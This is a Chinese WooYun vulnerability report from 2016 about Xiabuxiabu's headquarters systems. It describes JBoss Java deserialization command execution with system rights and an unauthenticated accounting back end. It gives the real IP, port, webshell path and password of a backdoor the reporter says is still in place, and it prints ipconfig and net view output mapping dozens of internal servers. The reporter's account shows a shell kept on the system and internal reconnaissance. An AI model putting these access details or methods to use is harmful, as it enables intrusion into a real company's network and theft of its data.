当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0193888

漏洞标题:呷哺呷哺总部第二处命令执行漏洞/已Getshell/可探测内网大量主机+一处未授权访问后台

相关厂商:呷哺呷哺

漏洞作者: 路人甲

提交时间:2016-04-08 15:36

修复时间:2016-05-23 15:40

公开时间:2016-05-23 15:40

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-08: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-23: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

mask 区域
1.http://**.**.**/RSC/
**********
*****18044bb5097f301ce88c.png&qu*****
**********
*****^^高 这个^*****
*****^^化命^*****
*****95cc32e46a76577a9e61.png&qu*****
**********
*****^昨晚的sh*****
**********
2.http://**.**.**/RAS/test.jsp 密码:j14n_
**********
*****a5d344e14dc2fe371c96.png&qu*****
**********
*****^^访问 直^*****
**********
3.http://**.**.**/RAS/_
**********
*****9c4465bad258d288db8e.png&qu*****
**********
*****9184c0a3444197a76037.png&qu*****
**********
*****网^*****
*****;ipcon*****
**********
**********
*****Config*****
**********
**********
**********
*****. . . . . .*****
**********
*****. . . . . . *****
**********
*****. . . . . .*****
**********
*****ed. . . . *****
**********
*****ed. . . . *****
**********
*****st. . . . . *****
**********
**********
**********
*****r 本地*****
**********
**********
**********
*****fic DNS Su*****
**********
*****: Intel(R) PRO/1000*****
**********
*****. . . . . : 00*****
**********
*****. . . . . *****
**********
*****. . . . . . :*****
**********
*****. . . . . . :*****
**********
*****. . . . . . :*****
**********
*****. . . . . . :*****
**********
***** 192.168.*****
**********
*****; net *****
***** *****
**********
*****-------------------*****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
***** *****
*****^完^*****
**********
**********
*****cod*****

漏洞证明:

http://116.218.128.230:9000/RSC/#

111.png


比之前的系统权限要高 这个是system权限
jboss java反序列化命令执行

111.png


直接getshell (发现昨晚的shell还在)
http://116.218.128.230:9000/RAS/test.jsp 密码:j14n

111.png


收入核算系统未授权访问 直接点登陆即可
http://116.218.128.230:9000/RAS/

111.png


111.png


也是内网环境

ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : report
Primary Dns Suffix . . . . . . . : xiabu.net
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : xiabu.net
Ethernet adapter 本地连接:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-AA-0D-E1
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.1.241
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.1.202
DNS Servers . . . . . . . . . . . : 192.168.1.243
192.168.1.220


net view
服务器名称 注释
-------------------------------------------------------------------------------
\\360SD
\\ADRMS
\\ATTENDANCE
\\BIPC01
\\BISRV01
\\BISRV02
\\BISRV03
\\BISRV04
\\BISRV05
\\BISRV06
\\BISRV07
\\BOH-APP
\\BOHSRVUP
\\CLIENT
\\COMETDB
\\CRMDB
\\DBSRV01
\\DBTEST
\\ERP-A
\\ERP-GS
\\ERPDATABASE
\\ERPDATABASE1
\\ERPDISAPP
\\ERPENTAPP
\\ERPOVRSRV
\\ERPWEBAPP ERPWEBAPP
\\EXCAS01
\\EXCAS02
\\EXMBX01
\\EXMBX02
\\GSSERVER
\\HHT-SRV
\\HHT-TEST
\\HHTSERVER
\\HR-APP
\\HR-ATTEND
\\HR-DB02
\\IAS
\\ICBC
\\KMS
\\LYNCSTD
\\MIDSERVER
\\OA-TEST
\\OAAPP
\\OADATABASE
\\PC0176
\\PC0506
\\PC0709
\\PRINTSERVER
\\REPORT
\\SEP
\\SPDB
\\U8
\\WEBSERVER
\\WXSERVER
\\X3550
\\X3650
\\X3850
\\XB-DC01
\\XB-DC02
\\XBREPORT
\\YQZL-APP
\\YQZL-BC
\\YQZL-BCM
\\YQZL-CCB
\\YQZL-DB YQZLDB
\\YQZL-PSBC
命令成功完成。


修复方案:

和上一个一样

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)